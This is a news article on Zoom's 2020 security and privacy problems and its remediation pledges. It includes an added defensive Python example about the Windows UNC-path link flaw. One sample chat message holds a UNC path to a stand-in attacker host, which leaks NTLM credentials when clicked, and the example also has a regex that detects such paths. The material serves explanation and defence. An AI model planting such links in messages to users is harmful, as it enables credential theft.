With self-isolation and quarantine now widespread, the Zoom video conferencing application has gained unprecedented popularity: its daily meeting participants grew from 10,000,000 in December 2019 to 200,000,000 in March 2020. At the same time, bug reports about the application reached a critical mass: SpaceX and NASA have even forbidden their employees to use Zoom.
Earlier, we already noted that the media and information security experts have harshly criticized the application. New privacy problems and serious vulnerabilities keep surfacing in Zoom. For example, it was found that the application sent analytics data to Facebook, misled users about end-to-end encryption (its "E2E" meetings are encrypted only between client and Zoom's servers), and did not explain why it collects user information at all. Cybercriminals also spread malware through fake Zoom domains.
Users reported that hundreds of strangers appeared in their contact lists because of a bug (Zoom's "Company Directory" grouped everyone who registered with the same e-mail domain, including public mail providers), and researchers found that the Zoom Windows client converts UNC paths in chat messages into clickable links, while on macOS an attacker already on the machine can escalate to root through the installer and inject code into the Zoom client to reach the webcam and microphone. Moreover, the developers have been slow to respond to these threats.
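The Windows issue deserves a closer look, because it is an ordinary chat feature turned into a credential leak. A UNC path such as `\\host\share\file` was rendered as a link; when a Windows user clicks it, the OS tries to open the share over SMB and sends the user's NTLM credentials (hashable and crackable, or relayable) to `host`, which the attacker controls. The following Python is an added example, not Zoom's code and not from the original page: `naive_linkify` reproduces the weak behaviour (every URL-looking thing, UNC paths included, becomes an anchor), `safe_linkify` is the hardened form that only links `http(s)` URLs, and `find_unc_paths` is a check you can run over chat logs to spot such messages. The sample messages and all function names are constructed for illustration.

```python
import html
import re

# Constructed sample chat messages (not taken from any real incident).
SAMPLE_MESSAGES = [
    "slides are at https://example.com/deck.pdf",
    r"grab the file from \\attacker.example\share\notes.docx",
    r"local build: \\127.0.0.1\c$\build.log and https://example.org",
]

# Only schemes we are willing to turn into clickable links.
HTTP_RE = re.compile(r'https?://[^\s<>"\']+', re.IGNORECASE)

# \\host\share\... : two backslashes, a hostname or address, one backslash,
# then a share name and optional path. Clicking this on Windows triggers an
# SMB connection to "host" carrying the user's NTLM credentials.
UNC_RE = re.compile(r'\\\\[A-Za-z0-9.\-]+\\[^\s<>"\']+')


def find_unc_paths(text: str) -> list[str]:
    """Return every UNC path found in a chat message (detection helper)."""
    return UNC_RE.findall(text)


def flag_messages(messages: list[str]) -> list[str]:
    """Return the messages that contain at least one UNC path."""
    return [m for m in messages if find_unc_paths(m)]


def _anchor(match: re.Match) -> str:
    # The text is already HTML-escaped, so it is safe to place in an attribute.
    target = match.group(0)
    return f'<a href="{target}">{target}</a>'


def naive_linkify(text: str) -> str:
    """Weak behaviour: links http(s) URLs *and* UNC paths.

    Rendering the UNC path as an anchor is exactly what lets a chat message
    coerce the victim's machine into an outbound SMB authentication.
    """
    escaped = html.escape(text, quote=True)
    return UNC_RE.sub(_anchor, HTTP_RE.sub(_anchor, escaped))


def safe_linkify(text: str) -> str:
    """Hardened behaviour: only http(s) URLs become links.

    UNC paths are left as inert, escaped text, so the user would have to copy
    them into Explorer by hand to contact the attacker's host.
    """
    escaped = html.escape(text, quote=True)
    return HTTP_RE.sub(_anchor, escaped)


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("message :", msg)
        print("unc     :", find_unc_paths(msg))
        print("naive   :", naive_linkify(msg))
        print("safe    :", safe_linkify(msg))
        print()
```

The allow-list approach (`HTTP_RE` only) is the right fix: trying to deny-list `\\` patterns misses variants such as `file://` URLs or forward-slash `//host/share` forms that Windows also resolves, whereas an allow-list of `http` and `https` schemes never hands the OS a path to a file share.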
"We developed our product without assuming that in a few weeks every person in the world would suddenly begin to work, study and communicate from home," says Zoom CEO Eric Yuan, apologizing for all the problems found in the application.
The situation now appears to have reached a critical point. It became known that Elon Musk recently forbade SpaceX employees to use Zoom, since the application has "significant security and privacy issues"; instead, they were told to fall back on e-mail and phone calls. Soon afterwards, NASA banned its employees from using Zoom for the same reasons.
After this news, Zoom's developers reported fixes for a number of the problems found by researchers. In particular, they apologized for the confusion over E2E encryption, removed the attention-tracking feature (which told a host whether attendees had the Zoom window in focus), and removed both the LinkedIn Sales Navigator integration that exposed participants' profile data and the Facebook SDK from the iOS client.
They also said that they would immediately freeze feature development for 90 days, focus entirely on improving the product's security, and commission an audit by third-party specialists.
Zoom also plans to:
- prepare transparency reports detailing requests for user data, records and content;
- improve the existing bug bounty program;
- create a CISO Council, together with CISOs from leading companies, to discuss security and privacy best practices;
- conduct a series of white-box penetration tests to identify and fix problems;
- hold weekly webinars on privacy and security updates, starting next week.